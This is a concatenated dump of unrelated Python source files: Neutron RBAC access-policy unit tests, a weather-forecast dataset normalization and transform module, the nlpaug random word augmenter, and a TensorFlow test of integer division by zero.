@mock.patch.object(_test_class.rbac_db_cls, 'db_model')\n def test_get_projects_with_shared_access_to_db_obj_return_project_ids(\n self, *mocks):\n ctx = mock.Mock()\n fake_ids = {'project_id_' + str(i) for i in range(10)}\n ctx.session.query.return_value.filter.return_value = [\n (fake_id,) for fake_id in fake_ids]\n ret_ids = self._test_class._get_projects_with_shared_access_to_db_obj(\n ctx, 'fake_db_obj_id')\n self.assertEqual(fake_ids, ret_ids)\n\n def test_is_accessible_for_admin(self):\n ctx = mock.Mock(is_admin=True, project_id='we_dont_care')\n self.assertTrue(self._test_class.is_accessible(ctx, None))\n\n def test_is_accessible_for_db_object_owner(self):\n ctx = mock.Mock(is_admin=False, project_id='db_object_owner')\n db_obj = mock.Mock(project_id=ctx.project_id)\n\n self.assertTrue(self._test_class.is_accessible(ctx, db_obj))\n\n @mock.patch.object(_test_class, 'is_shared_with_project',\n return_value=True)\n def test_is_accessible_if_shared_with_project(self, mock_is_shared):\n ctx = mock.Mock(is_admin=False, project_id='db_object_shareholder')\n db_obj = mock.Mock(project_id='db_object_owner')\n\n self.assertTrue(self._test_class.is_accessible(ctx, db_obj))\n mock_is_shared.assert_called_once_with(\n mock.ANY, db_obj.id, ctx.project_id)\n\n @mock.patch.object(_test_class, 'is_shared_with_project',\n return_value=False)\n def test_is_accessible_fails_for_unauthorized_project(self,\n mock_is_shared):\n ctx = mock.Mock(is_admin=False, project_id='Billy_the_kid')\n db_obj = mock.Mock(project_id='db_object_owner')\n\n self.assertFalse(self._test_class.is_accessible(ctx, db_obj))\n mock_is_shared.assert_called_once_with(\n mock.ANY, db_obj.id, ctx.project_id)\n\n def _rbac_policy_generate_change_events(self, resource, trigger,\n context, object_type, policy,\n event_list):\n for event in event_list:\n payload = events.DBEventPayload(\n context, states=(policy,),\n metadata={'object_type': object_type})\n if event == events.BEFORE_CREATE:\n payload.states = []\n payload.request_body = policy\n self._test_class.validate_rbac_policy_change(\n resource, event, trigger, payload=payload)\n\n @mock.patch.object(_test_class, 'validate_rbac_policy_update')\n def test_validate_rbac_policy_change_handles_only_object_type(\n self, mock_validate_rbac_update):\n self._rbac_policy_generate_change_events(\n resource=None, trigger='dummy_trigger', context=None,\n object_type='dummy_object_type', policy=None,\n event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE,\n events.BEFORE_DELETE))\n\n mock_validate_rbac_update.assert_not_called()\n\n @mock.patch.object(_test_class, 'validate_rbac_policy_update')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value={'project_id': 'tyrion_lannister'})\n def test_validate_rbac_policy_change_allowed_for_admin_or_owner(\n self, mock_get_object, mock_validate_update):\n context = mock.Mock(is_admin=True, project_id='db_obj_owner_id')\n self._rbac_policy_generate_change_events(\n resource=None, trigger='dummy_trigger', context=context,\n object_type=self._test_class.rbac_db_cls.db_model.object_type,\n policy={'object_id': 'fake_object_id'},\n event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))\n\n self.assertTrue(self._test_class.validate_rbac_policy_update.called)\n\n @mock.patch.object(_test_class, 'validate_rbac_policy_update')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value={'project_id': 'king_beyond_the_wall'})\n def test_validate_rbac_policy_change_forbidden_for_outsiders(\n self, mock_get_object, mock_validate_update):\n context = mock.Mock(is_admin=False, project_id='db_obj_owner_id')\n self.assertRaises(\n n_exc.InvalidInput,\n self._rbac_policy_generate_change_events,\n resource=mock.Mock(), trigger='dummy_trigger', context=context,\n object_type=self._test_class.rbac_db_cls.db_model.object_type,\n policy={'object_id': 'fake_object_id'},\n event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE))\n self.assertFalse(mock_validate_update.called)\n\n @mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def _test_validate_rbac_policy_delete_handles_policy(\n self, policy, mock_validate_delete):\n payload = events.DBEventPayload(\n n_context.get_admin_context(),\n states=(policy,),\n metadata={\n 'object_type':\n self._test_class.rbac_db_cls.db_model.object_type})\n self._test_class.validate_rbac_policy_delete(\n resource=mock.Mock(), event=events.BEFORE_DELETE,\n trigger='dummy_trigger', payload=payload)\n mock_validate_delete.assert_not_called()\n\n def test_validate_rbac_policy_delete_handles_shared_action(self):\n self._test_validate_rbac_policy_delete_handles_policy(\n {'action': 'unknown_action'})\n\n @mock.patch.object(obj_db_api, 'get_object')\n def test_validate_rbac_policy_delete_skips_db_object_owner(self,\n mock_get_object):\n policy = {'action': rbac_db_models.ACCESS_SHARED,\n 'target_tenant': 'fake_project_id',\n 'object_id': 'fake_obj_id',\n 'project_id': 'fake_project_id'}\n mock_get_object.return_value.project_id = policy['target_tenant']\n self._test_validate_rbac_policy_delete_handles_policy(policy)\n\n @mock.patch.object(obj_db_api, 'get_object')\n @mock.patch.object(_test_class, 'get_bound_project_ids',\n return_value='project_id_shared_with')\n def test_validate_rbac_policy_delete_fails_single_project_and_in_use(\n self, get_bound_project_ids_mock, mock_get_object):\n policy = {'action': rbac_db_models.ACCESS_SHARED,\n 'target_tenant': 'project_id_shared_with',\n 'project_id': 'object_owner_project_id',\n 'object_id': 'fake_obj_id'}\n context = mock.Mock()\n with mock.patch.object(\n self._test_class,\n '_get_db_obj_rbac_entries') as target_tenants_mock:\n filter_mock = target_tenants_mock.return_value.filter\n filter_mock.return_value.count.return_value = 0\n payload = events.DBEventPayload(\n context,\n states=(policy,),\n metadata={\n 'object_type':\n self._test_class.rbac_db_cls.db_model.object_type})\n self.assertRaises(\n ext_rbac.RbacPolicyInUse,\n self._test_class.validate_rbac_policy_delete,\n resource=None,\n event=events.BEFORE_DELETE,\n trigger='dummy_trigger',\n payload=payload)\n\n def test_validate_rbac_policy_delete_not_bound_project_success(self):\n context = mock.Mock()\n with mock.patch.object(\n self._test_class, 'get_bound_project_ids',\n return_value={'fake_tid2', 'fake_tid3'}), \\\n mock.patch.object(self._test_class,\n '_get_db_obj_rbac_entries') as get_rbac_entries_mock, \\\n mock.patch.object(\n self._test_class,\n '_get_projects_with_shared_access_to_db_obj') as sh_tids:\n get_rbac_entries_mock.filter.return_value.count.return_value = 0\n self._test_class._validate_rbac_policy_delete(\n context=context,\n obj_id='fake_obj_id',\n target_tenant='fake_tid1')\n sh_tids.assert_not_called()\n\n @mock.patch.object(_test_class, '_get_db_obj_rbac_entries')\n @mock.patch.object(_test_class,\n '_get_projects_with_shared_access_to_db_obj',\n return_value=['some_other_project'])\n @mock.patch.object(_test_class, 'get_bound_project_ids',\n return_value={'fake_id1'})\n def test_validate_rbac_policy_delete_fails_single_used_wildcarded(\n self, get_bound_project_ids_mock, mock_projects_with_shared_access,\n _get_db_obj_rbac_entries_mock):\n policy = {'action': rbac_db_models.ACCESS_SHARED,\n 'target_tenant': '*',\n 'project_id': 'object_owner_project_id',\n 'object_id': 'fake_obj_id'}\n context = mock.Mock()\n payload = events.DBEventPayload(\n context,\n states=(policy,),\n metadata={\n 'object_type':\n self._test_class.rbac_db_cls.db_model.object_type})\n with mock.patch.object(obj_db_api, 'get_object'):\n self.assertRaises(\n ext_rbac.RbacPolicyInUse,\n self._test_class.validate_rbac_policy_delete,\n resource=mock.Mock(),\n event=events.BEFORE_DELETE,\n trigger='dummy_trigger',\n payload=payload)\n\n @mock.patch.object(_test_class, 'attach_rbac')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value=['fake_rbac_policy'])\n @mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def test_update_shared_avoid_duplicate_update(\n self, mock_validate_delete, get_object_mock, attach_rbac_mock):\n obj_id = 'fake_obj_id'\n obj = self._test_class(mock.Mock())\n obj.update_shared(is_shared_new=True, obj_id=obj_id)\n get_object_mock.assert_called_with(\n obj.rbac_db_cls, mock.ANY, object_id=obj_id,\n target_tenant='*', action=rbac_db_models.ACCESS_SHARED)\n self.assertFalse(mock_validate_delete.called)\n self.assertFalse(attach_rbac_mock.called)\n\n @mock.patch.object(_test_class, 'attach_rbac')\n @mock.patch.object(obj_db_api, 'get_object', return_value=[])\n @mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def test_update_shared_wildcard(\n self, mock_validate_delete, get_object_mock, attach_rbac_mock):\n obj_id = 'fake_obj_id'\n\n test_neutron_obj = self._test_class(mock.Mock())\n test_neutron_obj.update_shared(is_shared_new=True, obj_id=obj_id)\n get_object_mock.assert_called_with(\n test_neutron_obj.rbac_db_cls, mock.ANY, object_id=obj_id,\n target_tenant='*', action=rbac_db_models.ACCESS_SHARED)\n\n attach_rbac_mock.assert_called_with(\n obj_id, test_neutron_obj.obj_context.project_id)\n\n def test_shared_field_false_without_context(self):\n test_neutron_obj = self._test_class()\n self.assertFalse(test_neutron_obj.to_dict()['shared'])\n\n @mock.patch.object(_test_class, 'attach_rbac')\n @mock.patch.object(obj_db_api, 'get_object',\n return_value=['fake_rbac_policy'])\n @mock.patch.object(_test_class, '_validate_rbac_policy_delete')\n def test_update_shared_remove_wildcard_sharing(\n self, mock_validate_delete, get_object_mock, attach_rbac_mock):\n obj_id = 'fake_obj_id'\n obj = self._test_class(mock.Mock())\n obj.update_shared(is_shared_new=False, obj_id=obj_id)\n get_object_mock.assert_called_with(\n obj.rbac_db_cls, mock.ANY, object_id=obj_id,\n target_tenant='*', action=rbac_db_models.ACCESS_SHARED)\n\n self.assertFalse(attach_rbac_mock.attach_rbac.called)\n mock_validate_delete.assert_called_with(mock.ANY, obj_id, '*')\n\n @mock.patch.object(_test_class, 'create_rbac_policy')\n def test_attach_rbac_returns_type(self, create_rbac_mock):\n obj_id = 'fake_obj_id'\n project_id = 'fake_project_id'\n target_tenant = 'fake_target_project'\n self._test_class(mock.Mock()).attach_rbac(obj_id, project_id,\n target_tenant)\n rbac_pol = create_rbac_mock.call_args_list[0][0][1]['rbac_policy']\n self.assertEqual(rbac_pol['object_id'], obj_id)\n self.assertEqual(rbac_pol['target_tenant'], target_tenant)\n self.assertEqual(rbac_pol['action'], rbac_db_models.ACCESS_SHARED)\n self.assertEqual(rbac_pol['object_type'],\n self._test_class.rbac_db_cls.db_model.object_type)\n"} {"ext": "py", "sha": "1a306f6dbf62485a1faeac3dfb2b6ee640b6a2b7", "content": "\"\"\"Various constants and distributions that decribe our dataset. Intended use\nis normalization of the fields before sending them to a neural net.\n\nSee notebook distributions-of-parameters.ipynb\"\"\"\n\nimport logging\nimport numpy as np\nimport torch\nimport random\nimport xarray as xr\n\nfrom .util import add_biweekly_dim, obs_to_biweekly, std_estimator, fix_s2s_dataset_dims\n\n_logger = logging.getLogger(__name__)\n\n\nFIELD_MEAN = {\n \"gh10\": 30583.0,\n \"gh100\": 16070.0,\n \"gh1000\": 76.19,\n \"gh200\": 11765.0,\n \"gh500\": 5524.374,\n \"gh850\": 1403.0,\n \"lsm\": 0.0,\n \"msl\": 100969.28,\n \"orog\": 387.1,\n \"siconc\": 0.17,\n \"sst\": 286.96,\n \"st100\": 268.75,\n \"st20\": 268.69,\n \"sm20\": 250.68,\n \"t2m\": 278.2237,\n \"tp\": 34.1,\n \"u1000\": -0.17,\n \"u850\": 1.26,\n \"u500\": 6.43,\n \"u200\": 14.43,\n \"u100\": 5.30,\n \"v1000\": 0.18,\n \"v850\": 0.11,\n \"v500\": -0.03,\n \"v200\": -0.01,\n \"v100\": 0.10,\n}\n\nFIELD_STD = {\n \"gh10\": 993.0,\n \"gh100\": 577.0,\n \"gh1000\": 110.14,\n \"gh200\": 605.0,\n \"gh500\": 341.80862,\n \"gh850\": 149.6,\n \"lsm\": 1.0,\n \"msl\": 1343.6,\n \"orog\": 856.0,\n \"siconc\": 0.35,\n \"sst\": 11.73,\n \"st100\": 26.74,\n \"st20\": 26.91,\n \"sm20\": 125.99,\n \"tp\": 43.7,\n \"t2m\": 21.2692,\n \"u1000\": 6.09,\n \"u850\": 8.07,\n \"u500\": 11.73,\n \"u200\": 17.76,\n \"u100\": 12.02,\n \"v1000\": 5.22,\n \"v850\": 6.144,\n \"v500\": 9.03,\n \"v200\": 12.18,\n \"v100\": 6.57,\n}\n\n\ndef normalize_dataset(dataset):\n for v in dataset.data_vars:\n dataset[v] = (dataset[v] - FIELD_MEAN[v]) / FIELD_STD[v]\n\n return dataset\n\n\ndef denormalize_dataset(dataset):\n for v in dataset.data_vars:\n dataset[v] = (dataset[v] * FIELD_STD[v]) + FIELD_MEAN[v]\n\n return dataset\n\n\ndef apply_to_all(transform, example):\n \"\"\"Utility function to apply a transform on all the kews of an example.\"\"\"\n new_example = {}\n for k in example:\n new_example[k] = transform(example[k])\n\n return new_example\n\n\nclass AddBiweeklyDimTransform:\n \"\"\"Transform that takes a training example and adds the biweekly dimension to it.\"\"\"\n\n def __init__(self, weeks_12=False, features=False):\n self.weeks_12 = weeks_12\n self.features = features\n\n def __call__(self, example):\n\n to_transform = [\"model\", \"obs\"]\n if self.features:\n to_transform.append(\"features\")\n\n new_example = {}\n for k in example:\n if k in to_transform:\n new_example[k] = add_biweekly_dim(example[k], weeks_12=self.weeks_12)\n else:\n new_example[k] = example[k]\n\n return new_example\n\n\nclass AddMetadata:\n \"\"\"Add various metadata to the example dict.\"\"\"\n\n def __call__(self, example):\n model = example[\"terciles\"]\n year = int(model.forecast_time.dt.year)\n month = int(model.forecast_time.dt.month)\n day = int(model.forecast_time.dt.day)\n example[\"monthday\"] = f\"{month:02}{day:02}\"\n example[\"month\"] = f\"{month:02}\"\n example[\"year\"] = f\"{year:04}\"\n\n example[\"latitude\"] = model.latitude\n example[\"longitude\"] = model.longitude\n\n return example\n\n\nclass AddDryMask:\n def __init__(self, threshold=0.01):\n self.threshold = threshold\n\n def __call__(self, example):\n edges = example[\"edges\"]\n wet_mask = (edges.isel(category_edge=0) > self.threshold).drop(\"t2m\")\n example[\"dry_mask\"] = ~wet_mask\n return example\n\n\nclass ExampleToPytorch:\n def __call__(self, example):\n pytorch_example = {}\n\n for dataset_name in [\n \"obs\",\n \"model\",\n \"features\",\n \"terciles\",\n \"edges\",\n \"model_parameters\",\n \"dry_mask\",\n \"eccc_parameters\",\n \"ncep_parameters\",\n ]:\n if dataset_name in example:\n dataset = example[dataset_name]\n for variable in dataset.data_vars:\n new_key = f\"{dataset_name}_{variable}\"\n pytorch_example[new_key] = torch.from_numpy(dataset[variable].data)\n\n for k in [\"year\", \"monthday\", \"month\", \"eccc_available\", \"ncep_available\"]:\n pytorch_example[k] = example[k]\n\n for k in [\"latitude\", \"longitude\"]:\n pytorch_example[k] = torch.from_numpy(example[k].data)\n\n return pytorch_example\n\n\nclass CompositeTransform:\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, example):\n transformed_example = example\n for t in self.transforms:\n transformed_example = t(transformed_example)\n\n return transformed_example\n\n def __repr__(self):\n inner_str = \", \".join([repr(t) for t in self.transforms])\n\n return f\"CompositeTransform([{inner_str}])\"\n\n\ndef t2m_to_normal(model):\n model_t2m_mean = model.t2m.mean(dim=[\"lead_time\", \"realization\"]).rename(\"t2m_mu\")\n model_t2m_std = std_estimator(model.t2m, dim=[\"lead_time\", \"realization\"]).rename(\n \"t2m_sigma\"\n )\n\n return xr.merge([model_t2m_mean, model_t2m_std]).rename(\n biweekly_forecast=\"lead_time\"\n )\n\n\ndef tp_to_normal(model):\n model_tp_mean = model.tp.isel(lead_time=-1).mean(dim=\"realization\").rename(\"tp_mu\")\n model_tp_std = std_estimator(model.tp.isel(lead_time=-1), dim=\"realization\").rename(\n \"tp_sigma\"\n )\n\n return (\n xr.merge([model_tp_mean, model_tp_std])\n .drop(\"lead_time\")\n .rename(biweekly_forecast=\"lead_time\")\n )\n\n\ndef model_to_distribution(model):\n model_t2m = t2m_to_normal(model)\n model_tp = tp_to_normal(model)\n\n return xr.merge([model_t2m, model_tp])\n\n\nclass LinearModelAdapter:\n def __init__(self, make_distributions=True):\n self.make_distributions = make_distributions\n\n def __call__(self, example):\n if self.make_distributions:\n example[\"model\"] = model_to_distribution(example[\"model\"])\n\n example[\"obs\"] = obs_to_biweekly(example[\"obs\"])\n\n return example\n\n\nclass CubeRootTP:\n \"\"\"Apply a cubic root on precipitation data.\"\"\"\n\n def __init__(self):\n pass\n\n def __call__(self, example):\n for k in [\"obs_tp\", \"edges_tp\"]:\n if k in example:\n example[k] = example[k] ** (1.0 / 3.0)\n\n return example\n\n\nclass AddLatLonFeature:\n def __init__(self):\n pass\n\n def __call__(self, example):\n obs = example[\"terciles\"]\n lat_array = obs[\"latitude\"].assign_coords(variable=\"lat\")\n lat_array = (lat_array / lat_array.max()).astype(\"float32\")\n\n lon_array = obs[\"longitude\"].assign_coords(variable=\"lon\")\n lon_array = np.sin(np.deg2rad(lon_array)).astype(\"float32\")\n\n features_array = example[\"features\"].features\n\n catted_features = xr.concat(\n [features_array, lat_array, lon_array], dim=\"variable\"\n )\n\n example[\"features\"] = catted_features.to_dataset()\n\n return example\n\n\nclass AddGeographyFeatures:\n def __init__(self, geography_file):\n geo_dataset = fix_s2s_dataset_dims(xr.open_dataset(geography_file))\n subset = geo_dataset[[\"orog\"]]\n geo = normalize_dataset(subset)\n self.geo_features = geo.to_array().to_dataset(name=\"features\")\n\n def __call__(self, batch):\n features = batch[\"features\"]\n\n geo_at_lead = self.geo_features.sel(lead_time=features.lead_time)\n new_features_dataset = xr.concat([features, geo_at_lead], dim=\"variable\")\n\n batch[\"features\"] = new_features_dataset\n\n return batch\n\n\nclass RandomNoise:\n def __init__(self, keys=[\"features_features\"], sigma=0.01):\n self.keys = keys\n self.sigma = sigma\n\n def __call__(self, example):\n for k in self.keys:\n x = example[k]\n example[k] += self.sigma * torch.randn_like(x)\n\n return example\n\n\nclass LongitudeRoll:\n def __init__(self):\n pass\n\n def __call__(self, example):\n obs = example[\"terciles\"]\n longitude_length = obs.sizes[\"longitude\"]\n\n roll = random.randint(0, longitude_length)\n\n rolled_example = example\n for k in example:\n if k not in [\"eccc_available\", \"ncep_available\"]:\n rolled_dataset = (\n example[k].roll(longitude=roll, roll_coords=True).drop(\"longitude\")\n )\n\n rolled_example[k] = rolled_dataset\n\n return rolled_example\n\n\nclass MembersSubsetTransform:\n def __init__(self, subset_size=1):\n self.subset_size = subset_size\n\n def __call__(self, example):\n features = example[\"features\"]\n\n n_members = features.sizes[\"realization\"]\n members = sorted(random.choices(range(n_members), k=self.subset_size))\n features = features.isel(realization=members)\n\n example[\"features\"] = features\n\n return example\n\n\nclass AddDateFeatureTransform:\n def __call__(self, example):\n features = example[\"features\"]\n date_features = np.sin(\n features.valid_time.assign_coords(variable=\"date\").dt.dayofyear / 366\n )\n new_features = xr.concat(\n [features.features, date_features], dim=\"variable\"\n ).astype(\"float32\")\n\n example[\"features\"] = new_features.to_dataset()\n\n return example\n\n\nclass VariableFilterTransform:\n def __init__(self, to_filter=None):\n self.to_filter = to_filter\n\n if to_filter is not None:\n _logger.info(\"Will filter vars: %s\", to_filter)\n\n def __call__(self, batch):\n if self.to_filter is not None:\n batch[\"features\"] = batch[\"features\"].sel(variable=self.to_filter)\n\n return batch\n\n\ndef full_transform(\n geography_file,\n weeks_12=False,\n make_distributions=False,\n random_noise_sigma=0.0,\n roll=False,\n n_members=1,\n filter_vars=None,\n biweekly_features=False,\n add_date=False,\n):\n xarray_transforms = [\n MembersSubsetTransform(n_members),\n AddLatLonFeature(),\n AddGeographyFeatures(geography_file),\n VariableFilterTransform(filter_vars),\n AddBiweeklyDimTransform(weeks_12, features=biweekly_features),\n ]\n\n if add_date:\n xarray_transforms.insert(2, AddDateFeatureTransform())\n\n if roll:\n xarray_transforms.append(LongitudeRoll())\n\n transforms = [\n *xarray_transforms,\n # LinearModelAdapter(make_distributions=make_distributions),\n AddMetadata(),\n ExampleToPytorch(),\n CubeRootTP(),\n RandomNoise(sigma=random_noise_sigma),\n ]\n return CompositeTransform(transforms)\n"} {"ext": "py", "sha": "1a306f8e75fc5c36e9eaee2fea00ba106b3d312e", "content": "\"\"\"\n Augmenter that apply random word operation to textual input.\n\"\"\"\n\nfrom nlpaug.augmenter.word import WordAugmenter\nfrom nlpaug.util import Action, Doc\n\n\nclass RandomWordAug(WordAugmenter):\n \"\"\"\n Augmenter that apply randomly behavior for augmentation.\n\n :param str action: 'substitute', 'swap', 'delete' or 'crop'. If value is 'swap', adjacent words will be swapped randomly.\n If value is 'delete', word will be removed randomly. If value is 'crop', a set of contunous word will be removed randomly.\n :param float aug_p: Percentage of word will be augmented. \n :param int aug_min: Minimum number of word will be augmented.\n :param int aug_max: Maximum number of word will be augmented. If None is passed, number of augmentation is\n calculated via aup_p. If calculated result from aug_p is smaller than aug_max, will use calculated result from\n aug_p. Otherwise, using aug_max.\n :param list stopwords: List of words which will be skipped from augment operation. Not effective if action is 'crop'\n :param str stopwords_regex: Regular expression for matching words which will be skipped from augment operation. Not effective if action is 'crop'\n :param list target_words: List of word for replacement (used for substitute operation only). Default value is _.\n :param func tokenizer: Customize tokenization process\n :param func reverse_tokenizer: Customize reverse of tokenization process\n :param str name: Name of this augmenter\n\n >>> import nlpaug.augmenter.word as naw\n >>> aug = naw.RandomWordAug()\n \"\"\"\n\n def __init__(self, action=Action.DELETE, name='RandomWord_Aug', aug_min=1, aug_max=10, aug_p=0.3, stopwords=None,\n target_words=None, tokenizer=None, reverse_tokenizer=None, stopwords_regex=None, \n verbose=0):\n super().__init__(\n action=action, name=name, aug_p=aug_p, aug_min=aug_min, aug_max=aug_max, stopwords=stopwords,\n tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, device='cpu', verbose=verbose,\n stopwords_regex=stopwords_regex, include_detail=False)\n\n self.target_words = target_words or ['_']\n\n # https://arxiv.org/pdf/1711.02173.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf\n def swap(self, data):\n if not data or not data.strip():\n return data\n\n change_seq = 0\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())\n\n # https://github.com/makcedward/nlpaug/issues/76\n if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n swap_idx = self._get_swap_position(aug_idx, doc.size() - 1)\n change_seq += 1\n doc = self.change_case(doc, aug_idx, swap_idx, change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n\n # TODO: Tune it\n def change_case(self, doc, original_word_idx, swap_word_idx, change_seq):\n original_token = doc.get_token(original_word_idx).get_latest_token().token\n swap_token = doc.get_token(swap_word_idx).get_latest_token().token\n\n if original_word_idx != 0 and swap_word_idx != 0:\n doc.add_change_log(original_word_idx, new_token=swap_token, action=Action.SWAP,\n change_seq=self.parent_change_seq+change_seq)\n doc.add_change_log(swap_word_idx, new_token=original_token, action=Action.SWAP,\n change_seq=self.parent_change_seq+change_seq)\n return doc\n\n original_token_case = self.get_word_case(original_token)\n swap_token_case = self.get_word_case(swap_token)\n\n if original_word_idx == 0:\n if original_token_case == 'capitalize' and swap_token_case == 'lower':\n doc.add_change_log(original_word_idx, new_token=swap_token.capitalize(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(original_word_idx, new_token=swap_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n if original_token_case == 'capitalize':\n doc.add_change_log(swap_word_idx, new_token=original_token.lower(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(swap_word_idx, new_token=original_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n\n if swap_word_idx == 0:\n if original_token_case == 'lower':\n doc.add_change_log(swap_word_idx, new_token=original_token.capitalize(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(swap_word_idx, new_token=original_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n\n if swap_token_case == 'capitalize':\n doc.add_change_log(original_word_idx, new_token=swap_token.lower(),\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n else:\n doc.add_change_log(original_word_idx, new_token=swap_token,\n action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)\n\n # Special case for i\n if doc.get_token(original_word_idx).get_latest_token().token == 'i':\n doc.update_change_log(original_word_idx, token='I')\n if doc.get_token(swap_word_idx).get_latest_token().token == 'i':\n doc.update_change_log(swap_word_idx, token='I')\n\n return doc\n\n def _get_swap_position(self, pos, token_length):\n if pos == 0:\n # Force swap with next character if it is first character\n return pos + 1\n elif pos == token_length:\n # Force swap with previous character if it is last character\n return pos - 1\n else:\n return pos + self.sample([-1, 1], 1)[0]\n\n # https://arxiv.org/pdf/1703.02573.pdf, https://arxiv.org/pdf/1712.06751.pdf, https://arxiv.org/pdf/1806.09030.pdf\n # https://arxiv.org/pdf/1905.11268.pdf,\n def substitute(self, data):\n if not data or not data.strip():\n return data\n\n change_seq = 0\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())\n aug_idxes.sort(reverse=True)\n\n if aug_idxes is None or len(aug_idxes) == 0:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n original_token = doc.get_token(aug_idx).orig_token.token\n new_token = self.sample(self.target_words, 1)[0]\n if aug_idx == 0:\n new_token = self.align_capitalization(original_token, new_token)\n\n change_seq += 1\n doc.add_change_log(aug_idx, new_token=new_token, action=Action.SUBSTITUTE, change_seq=self.parent_change_seq+change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n\n # https://arxiv.org/pdf/1905.11268.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf\n def delete(self, data):\n if not data or not data.strip():\n return data\n \n change_seq = 0\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())\n aug_idxes.sort(reverse=True)\n\n # https://github.com/makcedward/nlpaug/issues/76\n if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n original_token = doc.get_token(aug_idx).orig_token.token\n\n change_seq += 1\n doc.add_change_log(aug_idx, new_token='', action=Action.DELETE, change_seq=self.parent_change_seq+change_seq)\n if aug_idx == 0:\n new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)\n doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n\n # https://github.com/makcedward/nlpaug/issues/126\n def crop(self, data):\n if not data or not data.strip():\n return data\n\n change_seq = 1\n doc = Doc(data, self.tokenizer(data))\n\n aug_idxes = self._get_aug_range_idxes(doc.get_original_tokens())\n aug_idxes.sort(reverse=True)\n\n # https://github.com/makcedward/nlpaug/issues/76\n if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:\n if self.include_detail:\n return data, []\n return data\n\n for aug_idx in aug_idxes:\n original_token = doc.get_token(aug_idx).orig_token.token\n\n doc.add_change_log(aug_idx, new_token='', action=Action.CROP, change_seq=self.parent_change_seq+change_seq)\n if aug_idx == 0:\n new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)\n doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)\n\n if self.include_detail:\n return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()\n else:\n return self.reverse_tokenizer(doc.get_augmented_tokens())\n"} {"ext": "py", "sha": "1a306ffcdb9dc4ddf95e5ed6a658059fb7050757", "content": "# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for integer division by zero.\"\"\"\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.platform import test\n\n\nclass ZeroDivisionTest(test.TestCase):\n\n def testZeros(self):\n with test_util.use_gpu():\n for dtype in dtypes.uint8, dtypes.int16, dtypes.int32, dtypes.int64:\n zero = constant_op.constant(0, dtype=dtype)\n one = constant_op.constant(1, dtype=dtype)\n bads = [lambda x, y: x // y]\n if dtype in (dtypes.int32, dtypes.int64):\n bads.append(lambda x, y: x % y)\n for bad in bads:\n try:\n result = self.evaluate(bad(one, zero))\n except (errors.OpError, errors.InvalidArgumentError) as e:\n # Ideally, we'd get a nice exception. In theory, this should only\n # happen on CPU, but 32 bit integer GPU division is actually on\n # CPU due to a placer bug.\n # TODO(irving): Make stricter once the placer bug is fixed.\n self.assertIn('Integer division by zero', str(e))\n else:\n # On the GPU, integer division by zero produces all bits set.\n # But apparently on some GPUs \"all bits set\" for 64 bit division\n # means 32 bits set, so we allow 0xffffffff as well. This isn't\n # very portable, so we may need to expand this list if other GPUs\n # do different things.\n #\n # XLA constant folds integer division by zero to 1.\n self.assertTrue(test.is_gpu_available())\n self.assertIn(result, (-1, 1, 2, 0xff, 0xffffffff))\n\n\nif __name__ == '__main__':\n test.main()\n"} {"ext": 